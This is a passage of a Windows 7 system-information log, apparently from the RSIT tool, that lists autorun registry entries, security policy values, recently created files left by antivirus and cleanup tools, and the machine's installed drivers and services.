Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe [2007-12-24 222504] "USB Antivirus"=C:\Program Files\USB Disk Security\USBGuard.exe [2008-09-23 798720] "StartCCC"=C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [2013-03-28 642656] "IgfxTray"=C:\Windows\system32\igfxtray.exe [2011-08-09 142616] "HotKeysCmds"=C:\Windows\system32\hkcmd.exe [2011-08-09 177432] "Persistence"=C:\Windows\system32\igfxpers.exe [2011-08-09 176408] "PWRISOVM.EXE"=C:\Program Files\PowerISO\PWRISOVM.EXE [2016-06-07 406664] "BullGuard"=C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe [2016-09-04 1178392] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "Sidebar"=C:\Program Files\Windows Sidebar\sidebar.exe [2010-11-20 1174016] "GoogleChromeAutoLaunch_66044D0238289D879AA089D4FF4B32EE"=C:\Program Files\Google\Chrome\Application\chrome.exe [2016-08-02 961352] "{C278BE4D-C4D5-43CE-B864-81522531FC8F}"=C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [2009-07-13 452608] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui] C:\Windows\system32\igfxdev.dll [2011-08-09 294400] [HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders] "SecurityProviders"=credssp.dll [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BsMain] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BsScanner] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\BsMain] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\BsScanner] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\BsUpdate] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] "ConsentPromptBehaviorAdmin"=0 "ConsentPromptBehaviorUser"=3 "EnableLUA"=0 "EnableUIADesktopToggle"=0 "PromptOnSecureDesktop"=0 "dontdisplaylastusername"=0 "legalnoticecaption"= "legalnoticetext"= "shutdownwithoutlogon"=1 "undockwithoutlogon"=1 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer] "NoDriveTypeAutoRun"=181 "NoDrives"=0 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer] "NoDrives"=0 [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list] [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32] "vidc.mrle"=msrle32.dll "vidc.msvc"=msvidc32.dll "msacm.imaadpcm"=imaadp32.acm "msacm.msg711"=msg711.acm "msacm.msgsm610"=msgsm32.acm "msacm.msadpcm"=msadp32.acm "midimapper"=midimap.dll "wavemapper"=msacm32.drv "VIDC.UYVY"=msyuv.dll "VIDC.YUY2"=msyuv.dll "VIDC.YVYU"=msyuv.dll "VIDC.IYUV"=iyuv_32.dll "vidc.i420"=iyuv_32.dll "VIDC.YVU9"=tsbyuv.dll "msacm.l3acm"=C:\Windows\System32\l3codeca.acm "vidc.cvid"=iccvid.dll "wave"=wdmaud.drv "midi"=wdmaud.drv "mixer"=wdmaud.drv "aux"=wdmaud.drv "MSVideo8"=VfWWDM32.dll "wave2"=wdmaud.drv "midi2"=wdmaud.drv "mixer2"=wdmaud.drv "aux2"=wdmaud.drv "wave3"=wdmaud.drv "midi3"=wdmaud.drv "mixer3"=wdmaud.drv "aux3"=wdmaud.drv "wave4"=wdmaud.drv "midi4"=wdmaud.drv "mixer4"=wdmaud.drv "aux4"=wdmaud.drv "wave1"=wdmaud.drv "midi1"=wdmaud.drv "mixer1"=wdmaud.drv "aux1"=wdmaud.drv ======File associations====== .inf - open - "%SystemRoot%\system32\NOTEPAD.EXE" %1 .ini - open - "%SystemRoot%\system32\NOTEPAD.EXE" %1 .js - edit - C:\Windows\System32\Notepad.exe %1 .js - open - "%SystemRoot%\System32\WScript.exe" "%1" %* .txt - open - "%SystemRoot%\system32\NOTEPAD.EXE" %1 ======List of files/folders created in the last 1 month====== 2016-09-07 16:20:35 ----D---- C:\Program Files\trend micro 2016-09-07 16:20:34 ----D---- C:\rsit 2016-09-07 15:53:30 ----SD---- C:\32788R22FWJFW 2016-09-07 15:50:32 ----D---- C:\Program Files\Malwarebytes Anti-Malware 2016-09-07 15:50:32 ----A---- C:\Windows\system32\drivers\mwac.sys 2016-09-07 15:50:32 ----A---- C:\Windows\system32\drivers\mbamchameleon.sys 2016-09-07 15:49:18 ----A---- C:\Windows\system32\drivers\mbamswissarmy.sys 2016-09-07 15:49:17 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\Malwarebytes 2016-09-07 15:49:08 ----D---- C:\ProgramData\Malwarebytes 2016-09-07 15:49:07 ----A---- C:\Windows\system32\drivers\mbam.sys 2016-09-07 15:49:06 ----D---- C:\Program Files\Malwarebytes' Anti-Malware 2016-09-04 17:18:54 ----A---- C:\Windows\system32\BgGamingMonitor.dll 2016-09-04 17:18:45 ----A---- C:\Windows\system32\BGLsp.dll 2016-09-04 17:16:06 ----D---- C:\Program Files\Common Files\AV 2016-09-04 17:14:37 ----D---- C:\Program Files\BullGuard Ltd 2016-09-04 17:09:46 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\BullGuard 2016-09-04 17:07:17 ----D---- C:\Program Files\Common Files\BullGuard Ltd 2016-09-04 17:06:48 ----D---- C:\ProgramData\Package Cache 2016-09-04 17:05:49 ----D---- C:\ProgramData\BullGuard 2016-09-04 16:59:17 ----D---- C:\ProgramData\Dumps 2016-09-04 16:54:27 ----D---- C:\Program Files\Bitdefender 2016-09-04 16:34:14 ----A---- C:\bdlog.txt 2016-09-04 16:32:06 ----D---- C:\ProgramData\BDLogging 2016-09-04 16:32:02 ----A---- C:\Windows\capicom.dll 2016-09-04 16:26:43 ----A---- C:\ComboFix.txt 2016-09-04 16:24:00 ----SHD---- C:\$RECYCLE.BIN 2016-09-04 16:23:44 ----ASH---- C:\pagefile.sys 2016-09-04 16:22:25 ----D---- C:\Windows\temp 2016-09-04 16:13:06 ----A---- C:\Windows\zip.exe 2016-09-04 16:13:06 ----A---- C:\Windows\SWSC.exe 2016-09-04 16:13:06 ----A---- C:\Windows\SWREG.exe 2016-09-04 16:13:06 ----A---- C:\Windows\sed.exe 2016-09-04 16:13:06 ----A---- C:\Windows\PEV.exe 2016-09-04 16:13:06 ----A---- C:\Windows\NIRCMD.exe 2016-09-04 16:13:06 ----A---- C:\Windows\MBR.exe 2016-09-04 16:13:06 ----A---- C:\Windows\grep.exe 2016-09-04 16:13:01 ----D---- C:\Qoobox 2016-09-04 16:12:47 ----D---- C:\Windows\erdnt 2016-09-04 16:05:28 ----D---- C:\ProgramData\Bitdefender Agent 2016-09-04 16:02:42 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\QuickScan 2016-09-04 15:49:02 ----D---- C:\ProgramData\Norton 2016-09-04 15:48:47 ----D---- C:\ProgramData\NortonInstaller 2016-09-04 15:32:02 ----D---- C:\AdwCleaner 2016-09-02 15:38:58 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\Tropico 5 2016-09-02 15:38:11 ----A---- C:\Windows\system32\XAudio2_7.dll 2016-09-02 15:38:11 ----A---- C:\Windows\system32\XAPOFX1_5.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\XAudio2_6.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\XAudio2_5.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\XAPOFX1_4.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\xactengine3_7.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\xactengine3_6.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\xactengine3_5.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\X3DAudio1_7.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\D3DX9_43.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\D3DX9_42.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\d3dx11_43.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\d3dx11_42.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\d3dx10_43.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\d3dx10_42.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\d3dcsx_43.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\d3dcsx_42.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\D3DCompiler_43.dll 2016-09-02 15:38:10 ----A---- C:\Windows\system32\D3DCompiler_42.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\XAudio2_4.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\XAudio2_3.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\XAudio2_2.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\XAPOFX1_3.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\XAPOFX1_2.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\XAPOFX1_1.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\xactengine3_4.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\xactengine3_3.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\X3DAudio1_6.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\X3DAudio1_5.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\D3DX9_41.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\D3DX9_40.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\d3dx10_41.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\D3DCompiler_41.dll 2016-09-02 15:38:09 ----A---- C:\Windows\system32\D3DCompiler_40.dll 2016-09-02 15:38:08 ----A---- C:\Windows\system32\XAudio2_1.dll 2016-09-02 15:38:08 ----A---- C:\Windows\system32\XAPOFX1_0.dll 2016-09-02 15:38:08 ----A---- C:\Windows\system32\xactengine3_2.dll 2016-09-02 15:38:08 ----A---- C:\Windows\system32\xactengine3_1.dll 2016-09-02 15:38:08 ----A---- C:\Windows\system32\X3DAudio1_4.dll 2016-09-02 15:38:08 ----A---- C:\Windows\system32\D3DX9_39.dll 2016-09-02 15:38:08 ----A---- C:\Windows\system32\D3DX9_38.dll 2016-09-02 15:38:08 ----A---- C:\Windows\system32\d3dx10_39.dll 2016-09-02 15:38:08 ----A---- C:\Windows\system32\d3dx10_38.dll 2016-09-02 15:38:08 ----A---- C:\Windows\system32\D3DCompiler_39.dll 2016-09-02 15:38:08 ----A---- C:\Windows\system32\D3DCompiler_38.dll 2016-09-02 15:38:07 ----A---- C:\Windows\system32\XAudio2_0.dll 2016-09-02 15:38:07 ----A---- C:\Windows\system32\xactengine3_0.dll 2016-09-02 15:38:07 ----A---- C:\Windows\system32\xactengine2_10.dll 2016-09-02 15:38:07 ----A---- C:\Windows\system32\X3DAudio1_3.dll 2016-09-02 15:38:07 ----A---- C:\Windows\system32\D3DX9_37.dll 2016-09-02 15:38:07 ----A---- C:\Windows\system32\d3dx9_36.dll 2016-09-02 15:38:07 ----A---- C:\Windows\system32\d3dx10_37.dll 2016-09-02 15:38:07 ----A---- C:\Windows\system32\d3dx10_36.dll 2016-09-02 15:38:07 ----A---- C:\Windows\system32\D3DCompiler_37.dll 2016-09-02 15:38:07 ----A---- C:\Windows\system32\D3DCompiler_36.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\xinput1_3.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\xactengine2_9.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\xactengine2_8.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\xactengine2_7.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\X3DAudio1_2.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\d3dx9_35.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\d3dx9_34.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\d3dx9_33.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\d3dx10_35.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\d3dx10_34.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\d3dx10_33.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\D3DCompiler_35.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\D3DCompiler_34.dll 2016-09-02 15:38:06 ----A---- C:\Windows\system32\D3DCompiler_33.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\xinput1_2.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\xactengine2_6.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\xactengine2_5.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\xactengine2_4.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\xactengine2_3.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\x3daudio1_1.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\d3dx9_32.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\d3dx9_31.dll 2016-09-02 15:38:05 ----A---- C:\Windows\system32\d3dx10.dll 2016-09-02 15:38:04 ----A---- C:\Windows\system32\xinput1_1.dll 2016-09-02 15:38:04 ----A---- C:\Windows\system32\xactengine2_2.dll 2016-09-02 15:38:04 ----A---- C:\Windows\system32\xactengine2_1.dll 2016-09-02 15:37:59 ----A---- C:\Windows\system32\d3dx9_30.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\xactengine2_0.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\x3daudio1_0.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\d3dx9_29.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\d3dx9_28.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\d3dx9_27.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\d3dx9_26.dll 2016-09-02 15:37:58 ----A---- C:\Windows\system32\d3dx9_25.dll 2016-09-02 15:37:57 ----A---- C:\Windows\system32\d3dx9_24.dll 2016-09-02 15:35:44 ----D---- C:\Program Files\Tropico 5 2016-09-02 15:26:53 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\PowerISO 2016-09-02 15:23:42 ----D---- C:\Program Files\PowerISO ======List of files/folders modified in the last 1 month====== 2016-09-07 16:20:35 ----RD---- C:\Program Files 2016-09-07 16:19:51 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\uTorrent 2016-09-07 15:50:32 ----D---- C:\Windows\system32\drivers 2016-09-07 15:49:08 ----D---- C:\ProgramData 2016-09-07 05:48:10 ----D---- C:\Windows\system32\config 2016-09-07 03:41:00 ----D---- C:\Windows\inf 2016-09-07 03:40:23 ----D---- C:\Windows 2016-09-07 03:40:14 ----D---- C:\Windows\System32 2016-09-06 17:09:46 ----D---- C:\Windows\system32\catroot2 2016-09-06 10:44:19 ----D---- C:\Windows\Panther 2016-09-06 10:44:19 ----D---- C:\Windows\Logs 2016-09-06 10:44:19 ----D---- C:\Windows\debug 2016-09-06 10:44:17 ----D---- C:\Windows\Minidump 2016-09-06 10:44:06 ----SHD---- C:\System Volume Information 2016-09-04 17:16:06 ----D---- C:\Program Files\Common Files 2016-09-04 17:16:00 ----D---- C:\Windows\system32\Tasks 2016-09-04 17:09:47 ----SD---- C:\ProgramData\Microsoft 2016-09-04 17:09:39 ----D---- C:\Windows\system32\DriverStore 2016-09-04 17:09:39 ----D---- C:\Windows\system32\catroot 2016-09-04 17:07:16 ----SHD---- C:\Windows\Installer 2016-09-04 17:06:03 ----HD---- C:\Windows\system32\GroupPolicy 2016-09-04 16:56:49 ----D---- C:\Windows\system32\drivers\etc 2016-09-04 16:24:01 ----A---- C:\Windows\system.ini 2016-09-04 16:19:26 ----D---- C:\Windows\AppPatch 2016-09-04 15:52:42 ----D---- C:\Windows\Prefetch 2016-09-04 15:33:48 ----D---- C:\ProgramData\Lavasoft 2016-09-02 15:38:04 ----RSD---- C:\Windows\assembly 2016-09-02 15:38:02 ----D---- C:\Windows\Microsoft.NET 2016-09-02 15:22:27 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\Nero 2016-08-22 13:50:16 ----A---- C:\Windows\system32\PerfStringBackup.INI 2016-08-09 16:25:56 ----D---- C:\Users\DACAT Computer's\AppData\Roaming\vlc ======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)====== R0 hpdskflt;HP Filter; C:\Windows\system32\DRIVERS\hpdskflt.sys [2012-09-24 27968] R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2010-11-20 173440] R1 AFW;Agnitum Firewall Driver; C:\Windows\system32\DRIVERS\afw.sys [2016-01-13 44720] R1 BdAgent;BullGuard Security Agent; C:\Windows\system32\DRIVERS\BdAgent.sys [2016-01-13 98608] R1 BdSpy;BdSpy; C:\Windows\system32\drivers\BdSpy.sys [2016-01-13 69512] R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2010-11-20 388096] R1 NovaShieldFilterDriver;NovaShieldFilterDriver; C:\Windows\system32\DRIVERS\NSKernel.sys [2016-09-04 264416] R1 NovaShieldTDIDriver;NovaShieldTDIDriver; C:\Windows\system32\DRIVERS\NSNetmon.sys [2016-09-04 21328] R1 SCDEmu;SCDEmu; C:\Windows\system32\drivers\SCDEmu.sys [2016-05-24 123968] R1 vwififlt;Virtual WiFi Filter Driver; C:\Windows\system32\DRIVERS\vwififlt.sys [2009-07-13 48128] R3 Accelerometer;HP Mobile Data Protection Sensor; C:\Windows\system32\DRIVERS\Accelerometer.sys [2012-09-24 37696] R3 afwcore;afwcore; C:\Windows\system32\DRIVERS\afwcore.sys [2016-01-13 338608] R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2011-10-01 8396800] R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2011-10-01 247808] R3 BdNet;BdNet; C:\Windows\system32\DRIVERS\BdNet.sys [2016-01-13 27800] R3 BthEnum;Servicio enumerador de Bluetooth; C:\Windows\system32\DRIVERS\BthEnum.sys [2009-07-13 34816] R3 BthPan;Dispositivo Bluetooth (Red de área personal); C:\Windows\system32\DRIVERS\bthpan.sys [2009-07-13 93696] R3 BTHUSB;Controladora USB de radio Bluetooth; C:\Windows\System32\Drivers\BTHUSB.sys [2010-11-20 60416] R3 FLxHCIc;Fresco Logic xHCI (USB3) Device Driver; C:\Windows\system32\DRIVERS\FLxHCIc.sys [2013-02-25 205992] R3 GEARAspiWDM;GEAR ASPI Filter Driver; C:\Windows\system32\DRIVERS\GEARAspiWDM.sys [2012-10-03 26840] R3 intelkmd;intelkmd; C:\Windows\system32\DRIVERS\igdpmd32.sys [2011-08-09 10843136] R3 MEI;Intel(R) Management Engine Interface ; C:\Windows\system32\DRIVERS\HECI.sys [2013-01-23 56432] R3 NETwNs32;___ Controlador del adaptador Intel(R) Wireless WiFi Link para Windows 7 de 32 bits; C:\Windows\system32\DRIVERS\NETwsn00.sys [2013-07-10 10382576] R3 RFCOMM;Dispositivo Bluetooth (TDI protocolo RFCOMM); C:\Windows\system32\DRIVERS\rfcomm.sys [2009-07-13 129536] R3 RSPCIESTOR;Realtek PCIE CardReader Driver; C:\Windows\system32\DRIVERS\RtsPStor.sys [2013-05-16 267336] R3 RTL8167;Realtek 8167 NT Driver; C:\Windows\system32\DRIVERS\Rt86win7.sys [2013-04-10 651848] R3 Trufos;Trufos; C:\Windows\system32\DRIVERS\Trufos.sys [2016-03-31 428832] R3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv; \??\C:\Program Files\TuneUp Utilities 2011\TuneUpUtilitiesDriver32.sys [2011-06-06 10064] R3 WinUsb;WinUSB Driver; C:\Windows\system32\DRIVERS\WinUSB.sys [2010-11-20 35968] S2 eamonm;eamonm; C:\Windows\system32\DRIVERS\eamonm.sys [] S2 Parvdm;Parvdm; C:\Windows\system32\drivers\parvdm.sys [2009-07-13 8704] S3 aic78xx;aic78xx; C:\Windows\system32\drivers\djsvs.sys [2009-07-13 70720] S3 amdagp;AMD AGP Bus Filter Driver; C:\Windows\system32\drivers\amdagp.sys [2009-07-13 53312] S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0; C:\Windows\system32\DRIVERS\b57nd60x.sys [2009-07-13 229888] S3 BridgeMP;@%SystemRoot%\system32\bridgeres.dll,-1; C:\Windows\system32\DRIVERS\bridge.sys [2009-07-13 78336] S3 BTHPORT;Controlador de puertos Bluetooth; C:\Windows\System32\Drivers\BTHport.sys [2010-11-20 393216] S3 catchme;catchme; \??\C:\Users\DACATC~1\AppData\Local\Temp\catchme.sys [] S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-20 62464] S3 Netaapl;Apple Mobile Device Ethernet Service; C:\Windows\system32\DRIVERS\netaapl.sys [2014-08-15 18944] S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-13 12368] S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2010-11-20 133632] S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2010-11-20 15872] S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-20 5632] S3 sdbus;sdbus; C:\Windows\system32\DRIVERS\sdbus.sys [2010-11-20 84992] S3 sisagp;SIS AGP Bus Filter; C:\Windows\system32\drivers\sisagp.sys [2009-07-13 52304] S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-20 28032] S3 Synth3dVsc;Synth3dVsc; C:\Windows\System32\drivers\synth3dvsc.sys [2010-11-20 77184] S3 terminpt;Microsoft Remote Desktop Input Driver; C:\Windows\system32\drivers\terminpt.sys [2010-11-20 25600] S3 TsUsbFlt;@%SystemRoot%\system32\drivers\tsusbflt.sys,-1; C:\Windows\System32\drivers\tsusbflt.sys [2010-11-20 52224] S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2010-11-20 27264] S3 tsusbhub;@%SystemRoot%\system32\drivers\tsusbhub.sys,-1; C:\Windows\system32\drivers\tsusbhub.sys [2010-11-20 112640] S3 USBAAPL;Apple Mobile USB Driver; C:\Windows\System32\Drivers\usbaapl.sys [2014-08-15 45056] S3 usbscan;Controlador de escáner USB; C:\Windows\system32\DRIVERS\usbscan.sys [2009-07-13 35840] S3 VGPU;VGPU; C:\Windows\System32\drivers\rdvgkmd.sys [] S3 viaagp;VIA AGP Bus Filter; C:\Windows\system32\drivers\viaagp.sys [2009-07-13 53328] S3 ViaC7;VIA C7 Processor Driver; C:\Windows\system32\drivers\viac7.sys [2009-07-13 52736] S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-20 175360] S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-20 17920] ======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)====== R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2011-10-01 176128] R2 Apple Mobile Device;Apple Mobile Device; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2015-01-19 60744] R2 Bonjour Service;Servicio Bonjour; C:\Program Files\Bonjour\mDNSResponder.exe [2011-08-30 390504] R2 BsBackup;BullGuard backup service; C:\Windows\System32\SvcHost.exe [2009-07-13 20992] R2 BsBhvScan;BullGuard Behavioural Detection; C:\Program Files\BullGuard Ltd\BullGuard\BullGuardBhvScanner.exe [2016-09-04 590104] R2 BsCache;BullGuard cache service; C:\Windows\System32\SvcHost.exe [2009-07-13 20992] R2 BsFileScan;BullGuard on-access service; C:\Windows\System32\SvcHost.exe [2009-07-13 20992] R2 BsFire;BullGuard firewall service; C:\Windows\System32\SvcHost.exe [2009-07-13 20992] R2 BsMailProxy;BullGuard e-mail monitoring service; C:\Windows\System32\SvcHost.exe [2009-07-13 20992] R2 BsMain;BullGuard Main Service; C:\Windows\System32\SvcHost.exe [2009-07-13 20992] R2 BsScanner;BullGuard scanning service; C:\Program Files\BullGuard Ltd\BullGuard\BullGuardScanner.exe [2016-09-04 251160] R2 BsUpdate;BullGuard update service; C:\Program Files\BullGuard Ltd\BullGuard\BullGuardUpdate.exe [2016-09-04 343832] R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2009-07-13 20992] R2 hpsrv;HP Service; C:\Windows\system32\Hpservice.exe [2012-09-24 27968] R2 TuneUp.UtilitiesSvc;TuneUp Utilities Service; C:\Program Files\TuneUp Utilities 2011\TuneUpUtilitiesService32.exe [2011-07-18 1526592] R2 UxTuneUp;@%SystemRoot%\System32\uxtuneup.dll,-4096; C:\Windows\System32\svchost.exe [2009-07-13 20992] S2 gupdate;Servicio de Google Update (gupdate); C:\Program Files\Google\Update\GoogleUpdate.exe [2015-09-24 107848] S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2009-07-13 20992] S3 gupdatem;Servicio de Google Update (gupdatem); C:\Program Files\Google\Update\GoogleUpdate.exe [2015-09-24 107848] S3 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2010-06-10 136120] S3 iPod Service;Servicio del iPod; C:\Program Files\iPod\bin\iPodService.exe [2015-02-13 540968] S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe [2016-04-22 147624] S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2010-01-09 149352] S3 osppsvc;Office Software Protection Platform; C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4640000] S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2009-07-13 20992] S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2009-07-13 20992] -----------------EOF-----------------